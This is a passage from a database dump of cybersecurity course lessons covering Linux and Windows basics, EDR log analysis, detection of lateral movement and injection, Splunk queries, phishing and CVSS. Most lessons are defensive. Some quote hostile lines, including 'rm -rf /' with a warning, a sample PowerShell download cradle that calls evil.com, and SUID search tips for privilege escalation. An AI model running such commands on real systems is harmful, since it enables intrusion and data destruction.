file.txt`: Dumps the whole file to screen. Good for small files.\n2. `less file.txt`: Opens a paginated viewer. Scroll with arrows. Quit with `q`. Good for huge logs.\n3. `head file.txt`: Shows first 10 lines.\n4. `tail file.txt`: Shows last 10 lines.\n * `tail -f /var/log/syslog`: **Follow**. Shows new lines as they are written in real-time. Crucial for debugging.\n\n### Moving & Renaming\nLinux uses `mv` for both.\n* **Move**: `mv file.txt /tmp/` (Moves file to tmp).\n* **Rename**: `mv file.txt newname.txt` (Moves file to same place with new name).\n\n### Copying\n* `cp file.txt file_backup.txt`\n* `cp -r folder/ folder_backup/` (Recursive copy for directories).\n\n### Deleting (The Dangerous Part)\n* `rm file.txt`: Remove file. **There is no Recycle Bin**. It is gone.\n* `rm -r folder/`: Remove directory.\n* `rm -rf /`: **The Forbidden Command**. Recursively Force remove Root. Deletes the entire OS. Do not run this.\n\n### Hidden Files\nIn Linux, any file starting with `.` is hidden.\n* `.bashrc`: Your shell configuration.\n* `.ssh/`: Your keys.\nYou must use `ls -a` to see them.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'), (8, 8, '## Linux Permissions\n\nLinux is a multi-user OS. Permissions decide who can Read, Write, or Execute.\n\n### The Output of `ls -l`\nExample: `-rwxr-xr-- 1 owner group size date file`\n\nThe first part `rwxr-xr--` tells the story.\nIt is split into 3 groups of 3 characters:\n1. **User (Owner)**: `rwx` (Read, Write, Execute).\n2. **Group**: `r-x` (Read, Execute. No Write).\n3. **Others (World)**: `r--` (Read only).\n\n### The Modes\n* **r (Read)**:\n * File: View contents.\n * Dir: List contents (`ls`).\n* **w (Write)**:\n * File: Modify/Delete content.\n * Dir: Create/Delete files inside it.\n* **x (Execute)**:\n * File: Run as a program/script.\n * Dir: Enter the directory (`cd`).\n\n### Changing Permissions (`chmod`)\nYou can use numbers (Octal) or letters.\n\n**The Numbers**:\n* Read = 4\n* Write = 2\n* Execute = 1\n* Total = 7\n\n**Common Sets**:\n* `chmod 777 file`: Everyone can do everything. **Insecure**.\n* `chmod 700 file`: Only I (User) can read/write/run. Private keys usually need this.\n* `chmod 755 file`: I can do all. Everyone else can Read/Run. (Standard for scripts).\n* `chmod +x file`: Quick way to make a script executable.\n\n### Changing Owner (`chown`)\n* `chown user:group file`\n* `chown root:root /etc/shadow`', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'), (9, 9, '## Finding Files\n\nYou hacked a server. You want to find \"passwords.txt\". How?\n\n### 1. `locate`\nThe fast, indexed search.\n* `locate password.txt`\n* **Pros**: Instant.\n* **Cons**: Relies on a database (`updatedb`). If the file was made 1 minute ago, locate won\'t find it.\n\n### 2. `find`\nThe powerful, real-time crawler.\n* Syntax: `find [where] [filters] [action]`\n\n**Examples**:\n* `find / -name \"flag.txt\"`: Search whole drive for flag.txt.\n* `find /home -name \"*.conf\"`: Search home for configs.\n* `find / -type f -size +100M`: Find files larger than 100MB.\n* `find / -perm -4000 2>/dev/null`: Find SUID files (Privilege Escalation gold).\n * `2>/dev/null` hides \"Permission Denied\" errors so you only see clean results.\n\n### 3. `which`\nFinds executable binaries in your PATH.\n* `which python`: Shows `/usr/bin/python`.\n* If `which` returns nothing, the tool is not installed or not in PATH.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'), (10, 10, '## Grep (Global Regular Expression Print)\n\nGrep is the search tool for **content**. It finds text *inside* files.\n\n### Basic Usage\n* `grep \"error\" /var/log/syslog`: Show me lines containing \"error\".\n* `grep -i \"pass\" file.txt`: Case insensitive (finds \"Pass\", \"PASS\").\n* `grep -r \"apikey\" /var/www/html/`: **Recursive**. Search every file in the website folder for \"apikey\".\n\n### Pipes (`|`)\nThe pipe takes the output of the Left command and feeds it to the Right command. It is the most powerful feature of Linux.\n\n* `cat huge_log.txt | grep \"IP: 1.2.3.4\"`\n * 1. Cat dumps the file.\n * 2. Pipe catches it.\n * 3. Grep filters it.\n* `ls -la | grep \"Aug\"`: Show files modified in August.\n* `history | grep \"ssh\"`: Search my command history for SSH connections.\n\n### Real World Scenario: Log Analysis\nYou are investigating a web server access log.\n1. `cat access.log | grep \"404\"` (Find failures).\n2. `cat access.log | grep \"admin.php\"` (Find attempts to access admin).\n3. `cat access.log | awk \'{print $1}\' | sort | uniq -c | sort -nr`: (Count requests by IP address. The \"freq\" command stack).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'), (11, 11, '## Process Management\n\nEvery program running is a **Process**. Each has a unique **PID** (Process ID).\n\n### Viewing Processes\n1. `ps`: List my processes.\n2. `ps aux`: List **ALL** processes from all users.\n * **a**: All users.\n * **u**: User/owner column.\n * **x**: Processes not attached to a terminal (Daemons).\n3. `top`: Real-time task manager (CPU/RAM usage).\n * Press `q` to quit.\n\n### Killing Processes\nSometimes a program crashes or you need to stop a malicious script.\n* `kill [PID]`\n * Example: `kill 1234` (Polite kill request. SIGTERM).\n* `kill -9 [PID]`\n * **Force Kill**. (SIGKILL). The nuclear option. The kernel rips the process out of memory.\n\n### Backgrounding\n* **Foreground**: `ping google.com` -> Takes over your terminal.\n* **Background**: `ping google.com &` -> Runs in background. Terminal is free.\n* **Ctrl+Z**: Pauses current process.\n* `bg`: Resumes paused process in background.\n* `fg`: Brings background process to foreground.\n\n### Services (`systemctl`)\nDaemons that start at boot (like Apace/Nginx).\n* `systemctl status apache2`\n* `systemctl start apache2`\n* `systemctl stop apache2`\n* `systemctl enable apache2` (Start on boot).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'), (12, 12, '## Package Management\n\nInstalling software in Linux. We don\'t google \"download .exe\". We use Repositories (App Stores).\n\n### APT (Debian/Ubuntu/Kali)\n**Advanced Package Tool**.\n1. `apt update`: Refreshes the list of available software. (Does NOT install updates).\n * *Analogy*: Checking the catalogue to see what is new.\n2. `apt upgrade`: Actually installs the newer versions of installed packages.\n3. `apt install [package]`: Installs a tool.\n * `apt install nmap`\n * `apt install python3`\n4. `apt remove [package]`: Uninstalls.\n\n### Repositories\nYour OS looks in `/etc/apt/sources.list`.\nIf you try to install \"tool_xyz\" and it says \"Unable to locate package\", your sources.list might be missing the repository that contains it.\n\n### Other Managers\n* **YUM / DNF**: Used by Red Hat / CentOS / Fedora.\n * `dnf install httpd`\n* **Pacman**: Used by Arch Linux.\n * `pacman -S firefox`\n* **Snap**: Universal packages.\n * `snap install discord`\n\n### Compile from Source (Github)\nSometimes a tool isn\'t in Apt. You must build it.\n1. `git clone https://github.com/user/tool.git`\n2. `cd tool`\n3. Look for `README.md`!\n4. Usually: `./configure`, `make`, `make install` OR `pip install -r requirements.txt` (Python).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'), (350, 349, '# 🦅 Understanding EDR Telemetry\n\nEndpoint Detection and Response (EDR) tools provide a flight recorder for your endpoints. They capture everything a computer does.\n\n## 📝 The Raw Log\nBelow is a raw JSON log from an EDR agent (e.g., CrowdStrike/SentinelOne style).\n\n```json\n{\n \"event_type\": \"ProcessRoleup2\",\n \"timestamp\": \"2024-03-15T10:45:22Z\",\n \"hostname\": \"FINANCE-PC-01\",\n \"user_name\": \"CORP\\\\asmith\",\n \"file_name\": \"powershell.exe\",\n \"file_path\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n \"command_line\": \"powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString(\'http://evil.com/payload.ps1\')\"\",\n \"parent_process\": \"winword.exe\",\n \"parent_command_line\": \"\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE\" C:\\\\Users\\\\asmith\\\\Downloads\\\\Invoice_UPDATED.docx\",\n \"sha256\": \"9f9d5187af9e...\"\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Analyze the Hierarchy (Parent-Child)\n* **Parent**: `winword.exe` (Microsoft Word)\n* **Child**: `powershell.exe`\n* **Analysis**: Word documents should **never** spawn PowerShell. This is a classic sign of a **Malicious Macro**.\n\n### Step 2: Decode the Command Line\n* `-nop`: NoProfile (Hides awareness from user).\n* `-w hidden`: WindowStyle Hidden (User sees nothing).\n* `IEX`: Invoke-Expression (Execute code).\n* `DownloadString`: Fetch code from the internet.\n\n### Step 3: Check the Context\n* **User**: `asmith` (Finance Dept).\n* **Document**: `Invoice_UPDATED.docx`.\n* **Conclusion**: User opened a phishing email with a weaponized invoice.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'), (351, 350, '# 🌳 Analyzing Process Trees\n\nVisualizing the chain of execution is critical.\n\n## 📝 The Raw Log\nA series of events joined by process ID (PID).\n\n```text\n[TIME: 14:00:01] PID: 1044 | svchost.exe (System Service)\n └── [TIME: 14:00:05] PID: 2055 | cmd.exe /c \"whoami\"\n └── [TIME: 14:00:06] PID: 3100 | conhost.exe\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Identify the Root\n* **Root**: `svchost.exe`. This is a generic Windows service host.\n* **Issue**: `svchost.exe` launching `cmd.exe` is highly suspicious. It usually points to a compromised service (like a vulnerability in SMB or a web server running as system).\n\n### Step 2: Check the Child Activity\n* **Command**: `whoami`.\n* **Context**: This is a \"Discovery\" command. Attackers run it immediately after getting shell access to see who they are (SYSTEM vs User).\n\n### Step 3: The \"Conhost\"\n* `conhost.exe` is normal when `cmd` runs. It handles the console window.\n\n### 🔴 Assessment\nThis looks like a **Reverse Shell** or **Remote Code Execution (RCE)** exploit.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'), (352, 351, '# 🦀 Detecting Lateral Movement\n\nAfter compromising one machine, attackers move sideways to find the Crown Jewels (Domain Controller).\n\n## 📝 The Raw Log (PsExec Event)\n\n```xml\n\n \n 7045\n HR-LAPTOP-04\n \n \n PSEXESVC\n %SystemRoot%\\PSEXESVC.exe\n user mode service\n demand start\n LocalSystem\n \n\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Analyze Event 7045\n* **Event 7045**: A new service was installed.\n* **ServiceName**: `PSEXESVC`.\n* **Significance**: This is the default service name for **PsExec**, a tool often used by admins but LOVED by hackers for moving laterally.\n\n### Step 2: Contextualize\n* Did authorized IT staff deploy software at this time?\n* If NO, an attacker effectively \"remote controlled\" this machine from another infected host.\n\n### Step 3: Find the Source\n* Look for successful network logins (Event 4624, Type 3) occurring just before this event to find the **Patient Zero** IP.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'), (353, 352, '# 💉 Memory Injection Techniques\n\nFileless malware doesn\'t write to disk. It lives in RAM.\n\n## 📝 The Raw Log (Sysmon Event 8)\n\n```json\n{\n \"event_id\": 8,\n \"desc\": \"CreateRemoteThread\",\n \"source_image\": \"C:\\Users\\Bob\\AppData\\Local\\Temp\\malware.exe\",\n \"target_image\": \"C:\\Windows\\System32\\explorer.exe\",\n \"target_process_id\": \"4022\",\n \"start_address\": \"0xDEADBEEF\"\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: The \"Injector\"\n* **Source**: `malware.exe` running from `Temp`.\n* **State**: This is the malicious dropper.\n\n### Step 2: The \"Victim\"\n* **Target**: `explorer.exe`. This is the Windows desktop/file manager. It is *always* running.\n* **Action**: `CreateRemoteThread`. The source is forcing the target to run code.\n\n### Step 3: The Result\n* Once injected, `malware.exe` can delete itself.\n* The malicious code now runs INSIDE `explorer.exe`.\n* **Implication**: You will see `explorer.exe` making network connections to Russia. If you kill `explorer`, you kill the user\'s desktop session.\n\n### 🛡️ Response\nDo not just kill the process. Isolate the host and run memory forensics.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'), (354, 353, '# 🛑 Isolating Infected Hosts\n\nTime is money. The faster you act, the less damage occurs.\n\n## 📝 The Response Log (Audit Trail)\n\n```json\n{\n \"action\": \"ResponseAction\",\n \"type\": \"NetworkContainment\",\n \"status\": \"Success\",\n \"target_host\": \"FINANCE-PC-01\",\n \"initiator\": \"Analyst_Baris\",\n \"timestamp\": \"2024-03-15T10:55:00Z\",\n \"policy\": {\n \"allow_dns\": false,\n \"allow_edr_cloud\": true,\n \"allow_all_else\": false\n }\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Verification\n* **Action**: `NetworkContainment`.\n* **Policy**: The log confirms that the host can ONLY talk to the EDR cloud (`allow_edr_cloud: true`). This is vital. You don\'t want to lose your own access!\n\n### Step 2: What happens next?\n* The attacker loses their C2 connection.\n* **Active shells die**.\n* **Data exfiltration stops**.\n* The user sees \"No Internet\".\n\n### Step 3: Remediation\n1. **Live Response**: Connect via EDR shell.\n2. **Collect Artifacts**: Get the `Invoice_UPDATED.docx` file.\n3. **Re-image**: Wipe the machine. Better safe than sorry.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'), (360, 359, '# 🔎 Writing SPL\n\nSearch Processing Language (SPL) is the standard for querying big data in Splunk.\n\n## 📝 The Scenario\nYour boss says \"Find all failed logins from China in the last 24 hours.\"\n\n## 📝 The Raw Query (SPL)\n\n```splunk\nindex=main sourcetype=wineventlog:security EventCode=4625 \n| iplocation SourceNetworkAddress \n| search Country=\"China\"\n| stats count by SourceNetworkAddress, User\n| sort - count\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Filter Phase\n* `index=main`: Search only the main storage.\n* `EventCode=4625`: Windows Failed Identity.\n\n### Step 2: Enrichment\n* `iplocation`: Splunk automatically adds `Country`, `City`, `Lat`, `Lon` based on the IP address.\n\n### Step 3: Aggregation\n* `stats count by...`: Instead of showing 10,000 individual log lines, show me a table.\n* **Row 1**: IP `1.2.3.4`, User `Admin`, Count `500`.\n* **Conclusion**: We are under a brute force attack.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'), (361, 360, '# 🔗 Correlating Events\n\nA single log is a dot. Correlation connects the dots to make a picture.\n\n## 📝 The Raw Logs (Sequence)\n\n```text\n[09:00:01] Failed Login (User: Bob, IP: 10.0.0.50)\n[09:00:02] Failed Login (User: Bob, IP: 10.0.0.50)\n[09:00:03] Failed Login (User: Bob, IP: 10.0.0.50)\n... (50 more times)\n[09:01:00] Successful Login (User: Bob, IP: 10.0.0.50)\n[09:01:05] User Created (User: Admin2, By: Bob)\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Brute Force\n* The first block is a classic brute force attack.\n\n### Step 2: The Breakthrough\n* `[09:01:00]`: The attack succeeded. They guessed the password.\n\n### Step 3: Persistence\n* `[09:01:05]`: The very first thing the attacker did was create a BACKDOOR user (`Admin2`).\n* **Why**: Even if Bob changes his password, the attacker can still login as Admin2.\n\n### Step 4: The Correlation Rule\n* `Trigger Alert IF (Failed_Login > 10 in 5 mins) FOLLOWED BY (Successful_Login)`.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'), (368, 367, '# 🎣 Phishing Types\n\n## 📝 The Scenario\n**Email 1**: \"Dear Customer, your Netflix is expired. Click here.\"\n**Email 2**: \"Hi Bob, I enjoyed our meeting about Project X in London. Please review the attached contract.\"\n\n## 🕵️‍♂️ Investigation Steps\n\n### Analysis of Email 1 (Bulk Phishing)\n* **Greeting**: Generic (\"Dear Customer\").\n* **Urgency**: High (\"Expired\").\n* **Targeting**: None. Sent to millions.\n\n### Analysis of Email 2 (Spear Phishing)\n* **Greeting**: Personalized (\"Hi Bob\").\n* **Context**: specific (\"Project X\", \"London\").\n* **Source**: The attacker likely researched Bob on LinkedIn.\n* **Danger**: Extremely high. Users trust context.\n\n### 🛡️ Defense\nFor Spear Phishing, you rely on **User Awareness Training**. Technology often misses the context, but a human might spot that \"Project X\" was cancelled last week.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'), (369, 368, '# 🔗 URL Analysis\n\n## 📝 The Raw Link\n`http://www.paypal.com.secure-login-updates.xyz/login.php`\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: The Root Domain\n* **Reading**: Read from Right to Left.\n* **TLD**: `.xyz` (Cheap, often malicious).\n* **Domain**: `secure-login-updates.xyz`.\n* **Subdomains**: `www.paypal.com`.\n\n### Step 2: Homoglyphs\n* Look closely at: `pаypal.com`.\n* The \'a\' might be a Cyrillic character (IDN Homograph Attack). Use a \"Punycode Converter\" to check.\n* Real: `paypal.com`.\n* Fake: `xn--pypal-4ve.com`.\n\n### Step 3: Sandboxing\n* Paste the URL into **UrlScan.io**.\n* Look at the screenshot. Does it look like the real PayPal login page?\n* If yes, it is a credential harvester.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'), (370, 369, '# 💯 CVSS Scoring System\n\nUnderstanding the Common Vulnerability Scoring System (v3.1).\n\n## 📝 The Raw Vector\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Attack Vector (AV)\n* **AV:N (Network)**: The vulnerability can be exploited remotely over the internet. (BAD)\n* **AV:P (Physical)**: You need to touch the device (USB). (Less critical).\n\n### Step 2: Complexity & Privileges\n* **AC:L (Low Complexity)**: A script kiddie can do it.\n* **PR:N (None)**: No login required.\n* **UI:N (None)**: No user interaction required.\n\n### Step 3: CIA Impact\n* **C:H (Confidentiality High)**: They steal all data.\n* **I:H (Integrity High)**: They change all data.\n* **A:H (Availability High)**: They delete everything.\n\n### Score\n* **9.8 CRITICAL**. Drop everything and patch this.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'), (371, 370, '# 🏥 Prioritizing Patches\n\nYou have 10,000 vulnerabilities. You can patch 50. Which ones?\n\n## 📝 The Scenario\n1. **Server A**: Internal Test Server. Vulnerability: Score 10.0 (RCE).\n2. **Server B**: External Web Server. Vulnerability: Score 7.5 (SQLi).\n\n## 🕵️‍♂️ Decision Steps\n\n### Step 1: Exposure\n* **Server B** is reachable from the internet. Attackers are scanning it 24/7.\n* **Server A** is behind a firewall. Attackers need to be inside first.\n\n### Step 2: Exploitability\n* Is there a Metasploit module for the SQLi? Yes.\n* Is the RCE theoretical? Yes.\n\n### Step 3: Business Impact\n* If Web Server goes down, we lose money.\n* If Test Server goes down, devs preserve coffee.\n\n### 🏆 Verdict\n**Patch Server B first**. Context matters more than raw score.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'), (391, 32, '## Windows File System\n\nUnlike Linux (start at `/`), Windows starts at a Drive Letter, usually `C:`.\n\n### Key Directories\n1. `C:Windows`: The OS core.\n * `System32`: Critical DLLs and Executables. (Note: On 64-bit systems, System32 contains 64-bit files. `SysWOW64` contains 32-bit files. Confusing, but legacy.)\n2. `C:Users`: User profiles.\n * `C:UsersBobDesktop`, `Downloads`, etc.\n * `AppData`: Hidden folder storing app settings (Chrome history, Discord cache). Great for forensics.\n3. `C:Program Files`: Where 64-bit apps live.\n4. `C:Program Files (x86)`: Where 32-bit apps live.\n5. `C:PerfLogs`: Performance logs. Often empty, but sometimes writable by everyone (PrivEsc vector!).\n\n### ADS (Alternate Data Streams)\nA hidden feature of NTFS. A file can have \"sub-files\" hidden behind it.\n* `echo \"Hidden Data\" > innocent.txt:secret.txt`\n* `innocent.txt` looks normal. 0 bytes change.\n* Hackers use ADS to hide malware inside benign files.\n* **Detection**: `dir /R` shows streams.\n\n### Permissions (ICACLS)\nWindows uses ACLs (Access Control Lists).\n* **Full Control**: God mode.\n* **Modify**: Read/Write/Delete.\n* **Read & Execute**: Run programs.\n* **tool**: `icacls file.txt` (View permissions).', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'), (392, 33, '## User Account Control (UAC)\n\nIntroduced in Vista, UAC is the \"Dimmed Screen\" popup asking \"Do you want to allow this app to make changes?\".\n\n### The Concept\nEven if you are an Administrator, you run with \"Standard\" tokens most of the time. When you need to do a privileged action (like installing software), UAC pauses and asks for the \"Administrator\" token.\n* **Integrity Levels**:\n * **System**: Kernel level. Highest.\n * **High**: Administrators (Elevated).\n * **Medium**: Standard Users (and Admin non-elevated).\n * **Low**: Sandboxed apps (Browser tabs).\n\n### UAC Bypass\nA common hacking technique. Malware tries to assume the High Integrity token without triggering the popup.\n* **Fodhelper Exploit**: A built-in Windows binary that auto-elevates. Malware hijacks its registry keys to execute code as Admin silently.\n\n### Security Boundaries\nMicrosoft says UAC is **not** a security boundary. It is a convenience feature. If you are already Admin, UAC won\'t stop a sophisticated script.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'), (393, 34, '## The Windows Registry\n\nThe Registry is a massive hierarchical database storing ALL configuration settings.\n* Tool: `regedit.exe`.\n\n### The 5 Hives (Root Keys)\n1. **HKLM (HKEY_LOCAL_MACHINE)**: Settings for the computer (regardless of who is logged in).\n * `HKLMSoftware`: Installed programs.\n * `HKLMSystem`: Drivers, Services, Boot config.\n2. **HKCU (HKEY_CURRENT_USER)**: Settings for YOU.\n * Wallpaper, theme, saved passwords.\n * Actually points to `HKUSID`.\n3. **HKCR (Classes Root)**: File associations (open .pdf with Acrobat).\n4. **HKU (Users)**: Stores profiles for all users.\n5. **HKCC (Current Config)**: Hardware profile.\n\n### Persistence in Registry\nHackers love the registry because you can tell Windows to run malware at boot.\n* **Run Keys**: `HKLMSoftwareMicrosoftWindowsCurrentVersionRun`. Anything here starts when ANY user logs in.\n* **RunOnce**: Starts once then deletes itself.\n* **Services**: `HKLMSystemCurrentControlSetServices`.\n\n### Forensics Value\n* **ShimCache / AmCache**: Evidence of program execution (even if deleted).\n* **shellbags**: Evidence of which folders were opened.\n* **USBSTOR**: History of every USB drive ever plugged in.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'), (394, 35, '## Active Directory (AD)\n\nIf you work in a corporate environment, you use AD. It allows centralized management of users and computers.\n* **Domain Controller (DC)**: The server running AD (usually Windows Server). It holds the database (`ntds.dit`).\n\n### Core Concepts\n1. **Domain**: A security boundary. e.g., `corp.local`.\n2. **Object**: Anything in the domain (User, Computer, Printer, Group).\n3. **OU (Organizational Unit)**: Folders to organize objects (Sales, HR, IT). You apply policies (GPO) to OUs.\n4. **Forest**: A collection of Domain Trees. The top level container.\n\n### Authentication: Kerberos vs NTLM\n* **NTLM**: The old, challenge-response protocol. Vulnerable to \"Pass the Hash\".\n* **Kerberos**: The standard. Uses \"Tickets\".\n * **TGT (Ticket Granting Ticket)**: Proof you are essentially authenticated.\n * **TGS (Ticket Granting Service)**: Proof you can access a specific service (like a File Share).\n * **Attacks**: Golden Ticket (Forging TGTs), Kerberoasting (Stealing Service Account hashes).\n\n### BloodHound\nA tool used by both Red and Blue teams to visualize AD relationships. It finds \"Attack Paths\" (e.g., User A is Admin on Computer B, where Admin C is logged in...).', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'), (395, 36, '## PowerShell\n\nThe most powerful tool in Windows. It is an Object-Oriented shell.\n(`cmd.exe` is text-based. `powershell.exe` handles Objects).\n\n### Cmdlets (Command-lets)\nThey follow `Verb-Noun` syntax.\n* `Get-Process`: List processes.\n* `Stop-Service`: Stop a service.\n* `New-Item`: Create a file.\n\n### Aliases\nShortcuts for Linux users.\n* `ls` -> `Get-ChildItem`\n* `cat` -> `Get-Content`\n* `wget` -> `Invoke-WebRequest`\n\n### The Pipeline `|`\nPasses objects.\n* `Get-Process | Sort-Object CPU -Descending | Select-Object -First 5`\n * Get all processes.\n * Sort them by CPU usage.\n * Show only top 5.\n\n### PowerShell for Hackers\n* **Fileless Malware**: Running a script strictly in memory (RAM). No file touches the disk, so Antivirus often misses it.\n* **Execution Policy**: A safety feature, not security.\n * `Set-ExecutionPolicy Bypass`: Ignores the restrictions.\n* **Logging**: Script Block Logging (Event 4104) is the only way to catch malicious PowerShell.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'), (396, 37, '## Windows Event Logs\n\nThe \"Black Box\" of Windows. Stored in `.evtx` format.\nViewer: `Event Viewer` (`eventvwr.msc`).\n\n### Main Logs\n1. **Security**: Logins, Privilege use. (Most important for us).\n2. **System**: Drivers, Service crashes, Reboot.\n3. **Application**: App crashes (SQL Server logs, etc).\n\n### Critical Event IDs to Memorize\nIf you are a SOC Analyst, tattoo these on your arm.\n\n* **4624**: Successful Logon.\n * Look at **Logon Type**:\n * Type 2: Interactive (Keyboard/Local).\n * Type 3: Network (SMB/Shared Folder).\n * Type 10: RDP (Remote Desktop).\n* **4625**: Failed Logon. (Brute force indicator).\n* **4720**: User Created. (Did a hacker add a backdoor user?).\n* **4672**: Special Privileges Assigned. (Admin logon).\n* **1102**: Audit Log Cleared. (Hacker trying to cover tracks. HUGE RED FLAG).\n* **7045**: Service Installed (System Log). (Persistence mechanism).\n\n### Sysmon (System Monitor)\nDefault Windows logs are okay. **Sysmon** (from Sysinternals) is amazing. It logs process creation, network connections, and DNS Lookups.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'), (397, 38, '## Group Policy (GPO)\n\nGroup Policy Objects allows Admins to push settings to thousands of computers at once.\n* \"Disable Control Panel for all HR employees.\"\n* \"Set the wallpaper to company logo.\"\n* \"Install Chrome on all computers.\"\n\n### Structure\n* **Computer Configuration**: Applies to the machine (starts at boot).\n* **User Configuration**: Applies to the user (starts at login).\n\n### The Refresh\nGPO is not instant.\n* `gpupdate /force`: Command to force a sync with the DC.\n* Refreshes every 90 minutes by default.\n\n### Abuse\nIf a hacker compromises a Domain Admin account, they can create a malicious GPO to deploy Ransomware to every PC in the company instantly. This is how massive breaches happen.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'), (398, 39, '## Windows Security Tools\n\nBuilt-in and Sysinternals tools you should know.\n\n### Native Tools\n* **Task Manager**: Identify resource hogs.\n* **Resource Monitor**: Detailed network/disk view.\n* **Windows Defender Firewall**: Controls Inbound/Outbound traffic.\n* **BitLocker**: Full Disk Encryption. Protects data if laptop is stolen.\n\n### Sysinternals Suite\nA set of free tools active maintained by Mark Russinovich (Azure CTO).\n1. **Process Explorer**: \"Task Manager on steroids\". Shows DLLs loaded, handles open, and verify file signatures (detect malware pretending to be Microsoft).\n2. **Process Monitor (ProcMon)**: Real-time logs of File System, Registry, and Network activity.\n * *Use*: Run malware, watch ProcMon to see what files it creates.\n3. **Autoruns**: Shows EVERYTHING that starts at boot. (Registry run keys, Scheduled Tasks, Services, Drivers). Best tool for finding persistence.\n4. **TCPView**: Real-time view of open ports and connections.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'), (416, 22, '## The OSI Model\n\nThe **Open Systems Interconnection** model describes how data moves from one computer to another. It has 7 Layers.\n\"**P**lease **D**o **N**ot **T**hrow **S**ausage **P**izza **A**way\"\n\n### The Layers (Bottom Up)\n1. **Physical (Layer 1)**: The cables, fiber optics, and radio waves (WiFi). Bits (0s and 1s).\n * *Device*: Hub, Cable.\n * *Attack*: Wiretapping, Jamming.\n2. **Data Link (Layer 2)**: MAC Addresses (Physical usage). Switches operate here.\n * *Unit*: Frame.\n * *Attack*: ARP Spoofing.\n3. **Network (Layer 3)**: IP Addresses (Logical usage). Routers operate here.\n * *Unit*: Packet.\n * *Attack*: Ping Flood.\n4. **Transport (Layer 4)**: TCP/UDP. Ports. Reliability.\n * *Unit*: Segment.\n * *Attack*: SYN Flood (DoS).\n5. **Session (Layer 5)**: Establishing and ending connections (Sessions).\n6. **Presentation (Layer 6)**: Encryption (SSL/TLS) and formatting (JPEG/ASCII).\n7. **Application (Layer 7)**: The software you use (HTTP, DNS, SMTP).\n\n### Interaction\nWhen you click a link:\n* **Encapsulation**: Data goes DOWN the stack (L7 -> L1) adding headers at each layer.\n* **Decapsulation**: Data goes UP the stack (L1 -> L7) stripping headers.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'), (417, 23, '## TCP/IP Protocol Suite\n\nThe ISO model is theoretical. TCP/IP is what we actually use.\n\n### TCP (Transmission Control Protocol)\n**Connection-Oriented**. \"Reliable\".\n1. **The 3-Way Handshake**:\n * **SYN** (Client): \"Hi, can we talk?\"\n * **SYN-ACK** (Server): \"Yes, I am open.\"\n * **ACK** (Client): \"Great, here is data.\"\n2. **Guarantees Delivery**: If a packet is lost, TCP resends it.\n3. **Use Case**: Web browsing (HTTP), Email (SMTP), File Transfer (FTP). You don\'t want a missing pixel in your file.\n\n### UDP (User Datagram Protocol)\n**Connection-less**. \"Fire and Forget\".\n1. No Handshake. No Guarantee.\n2. The sender just blasts data. If you miss it, tough luck.\n3. **Use Case**: Streaming Video, VoIP (Voice), DNS.\n * *Why?* Speed. If you drop a frame in a video, you don\'t want to pause and wait for it to resend. You just move to the next frame.\n\n### Headers\n* **TCP Header**: Source Port, Dest Port, Sequence Number, Flags (SYN/ACK/FIN/RST).\n* **IP Header**: Source IP, Dest IP, TTL (Time To Live).', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'), (418, 24, '## IP Addressing\n\nEvery device needs an IP.\n* **IPv4**: 32-bit. `192.168.1.1`. (Running out).\n* **IPv6**: 128-bit. `2001:db8::1`. (The future).\n\n### IPv4 Classes\n* **Class A**: `1.0.0.0` to `126.x.x.x` (Huge networks).\n* **Class B**: `128.0.0.0` to `191.x.x.x` (Universities).\n* **Class C**: `192.0.0.0` to `223.x.x.x` (Small networks).\n\n### Private IPs (RFC 1918)\nThese IPs do not route on the internet. Used for LANs.\n* `10.0.0.0` - `10.255.255.255`\n* `172.16.0.0` - `172.31.255.255`\n* `192.168.0.0` - `192.168.255.255`\n* **Loopback**: `127.0.0.1` (Localhost).\n\n### Subnetting 